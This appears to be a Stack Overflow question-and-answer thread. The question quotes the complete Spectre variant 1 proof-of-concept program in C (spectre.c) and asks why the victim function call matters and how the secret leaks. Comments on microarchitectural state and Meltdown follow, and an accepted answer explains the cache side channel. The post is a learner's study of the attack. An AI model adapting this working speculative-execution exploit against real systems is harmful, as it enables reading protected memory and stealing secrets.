# How does this code read the "secret" data?

Tags: security, x86, intel

I found this code in a document.

Filename: `spectre.c`

```c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h>
#pragma optimize("gt", on)
#else
#include <x86intrin.h>
#endif
/* for rdtscp and clflush */
/* for rdtscp and clflush */
/******************************************************************** Victim code. ********************************************************************/
unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[160] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16};
uint8_t unused2[64];
uint8_t array2[256 * 512];
char *secret = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMM";
uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */
void victim_function(size_t x) {
    if (x < array1_size) {
        temp &= array2[array1[x] * 512];
    }
}
/******************************************************************** Analysis code ********************************************************************/
#define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold */
/* Report best guess in value[0] and runner-up in value[1] */
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) {
    static int results[256];
    int tries, i, j, k, mix_i, junk = 0;
    size_t training_x, x;
    register uint64_t time1, time2;
    volatile uint8_t *addr;
    for (i = 0; i < 256; i++)
        results[i] = 0;
    for (tries = 999; tries > 0; tries--) {
        /* Flush array2[256*(0..255)] from cache */
        for (i = 0; i < 256; i++)
            _mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */
        /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
        training_x = tries % array1_size;
        for (j = 29; j >= 0; j--) {
            _mm_clflush(&array1_size);
            for (volatile int z = 0; z < 100; z++)
            {}                                                                         /* Delay (can also mfence) */
            /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */ /* Avoid jumps in case those tip off the branch predictor */
            x = ((j % 6) - 1) & ~0xFFFF;                                               /* Set x=FFF.FF0000 if j%6==0, else x=0 */
            x = (x | (x >> 16));                                                       /* Set x=-1 if j&6=0, else x=0 */
            x = training_x ^ (x & (malicious_x ^ training_x));
            /* Call the victim! */
            victim_function(x);
        }
        /* Time reads. Order is slightly mixed up to prevent stride prediction */
        for (i = 0; i < 256; i++) {
            mix_i = ((i * 167) + 13) & 255;
            addr = &array2[mix_i * 512];
            time1 = __rdtscp(&junk);
            junk = *addr;
            time2 = __rdtscp(&junk) - time1;
            if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
                results[mix_i]++; /* cache hit - add +1 to score for this value */
        }
        /* Locate highest & second-highest results results tallies in j/k */
        /* READ TIMER */
        /* MEMORY ACCESS TO TIME */
        /* READ TIMER & COMPUTE ELAPSED TIME */
        j = k = -1;
        for (i = 0; i < 256; i++) {
            if (j < 0 || results[i] >= results[j]) {
                k = j;
                j = i;
            }
            else if (k < 0 || results[i] >= results[k]) {
                k = i;
            }
        }
        if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
            break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
    }
    results[0] ^= junk; /* use junk so code above won't get optimized out*/
    value[0] = (uint8_t)j;
    score[0] = results[j];
    value[1] = (uint8_t)k;
    score[1] = results[k];
    /* default for malicious_x */
}
int main(int argc, const char **argv) {
    size_t malicious_x = (size_t)(secret - (char *)array1);
    int i, score[2], len = 51;
    uint8_t value[2];
    for (i = 0; i < sizeof(array2); i++)
        array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
    if (argc == 3) {
        sscanf(argv[1], "%p", (void **)(&malicious_x));
        malicious_x -= (size_t)array1; /* Convert input value into a pointer */
        sscanf(argv[2], "%d", &len);
    }
    printf("Reading %d bytes:\n", len);
    while (--len >= 0) {
        printf("Reading at malicious_x = %p... ", (void *)malicious_x);
        readMemoryByte(malicious_x++, value, score);
        printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
        printf("0x%02X='%c' score=%d    ", value[0],
            (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
        if (score[1] > 0)
            printf("(second best: 0x%02X score=%d)", value[1], score[1]);
        printf("\n");
    }
    return (0);
}
```

I read through the whole code and I've made sure I understand what every single line does. Then I tried modifying the code bit-by-bit. But it seems no matter how I modify the code in `readMemoryByte()`, the program fails or outputs results with a significantly lower precision and accuracy. Even an addition of a `printf()` statement or a seemingly useless assignment statement (like `temp += x`) messes the program up.

I'm not going to ask for a full description of how the program works because that'd be too broad. I'm trying to understand it by myself. Here are my questions:

1. If I remove the call to `victim_function()` all the program outputs are wrong (no successful read to `secret`). Why and how is that call necessary? All it does seems to be logically nothing (no values written except a variable `temp` that's unused everywhere else) but I just can't omit it.
2. The global variable `secret` is not used anywhere except for calculating the initial value for `malicious_x`. How is its content accessed? It seems there's a good boundary check everywhere so out-of-boundary reading doesn't look quite possible. It's probably done from processor cache. If so then I can't figure out how the content of `secret` is sent to cache.

I've tried the above code on Intel Clarkdale, Intel Ivy Bridge, Intel Haswell, Intel Skylake and Intel Kaby Lake processors (those are all I can find for now). All the results are the same.

Comment: I am trying to repro meltdown right now, what a coincidence.

Comment: It's a cache-state and branch-prediction side-channel, so of course calling `printf` will mess it up if you do it anywhere where the *micro*architectural state matters, not just the architectural state. 
 https://spectreattack.com/spectre.pdf.

Comment: @PeterCordes Off-topic: the meltdown attack (which is related) is described as a race-condition while as I understand it is due to the fact that the privileges check is done at retirement time, giving the speculated load *and a subsequent depend store* time to execute. So it's more of a structural flaw than a race-condition, What do you think?

Comment: @MargaretBloom: Well the pending fault races with the dependent load based on the data from the faulting load.  Apparently on some CPUs, the window for this attack is only a couple cycles.  But yes, there wouldn't be a problem at all if the load port / TLB squashed the load in the first place, or if the translation result for TLB entries that exist but don't have enough privilege was forced to the 4k physical zero page (even for hugepages, still produce all zeros in all bits above the page offset).  So Meltdown is *also* a design flaw in Intel's load port / TLB design.

Answer (score 0, accepted):

I will try to answer both your question according to my understanding of spectre.

1. Removing call to `victim_function()` doesn't reveal secret. Yes that is because the attack is based of cache hits and misses. The victim function brings the appropriate pages (actually cache lines) in the cache and the next time (after the call to `victim_function`), when you try to probe each memory location and record the time required to do it, you can identify which memory locations were accessed by `victim_function`. This means that even though victim function doesn't leak the information "explicitly", it does so through the side channel of cache. And so if you remove the call, the cache is flushed and you get no secret.
2. The secret is transferred as indices into `array2` which is used in the victim function. This is how a "representation" of secret gets into the cache and can be read by the exploit.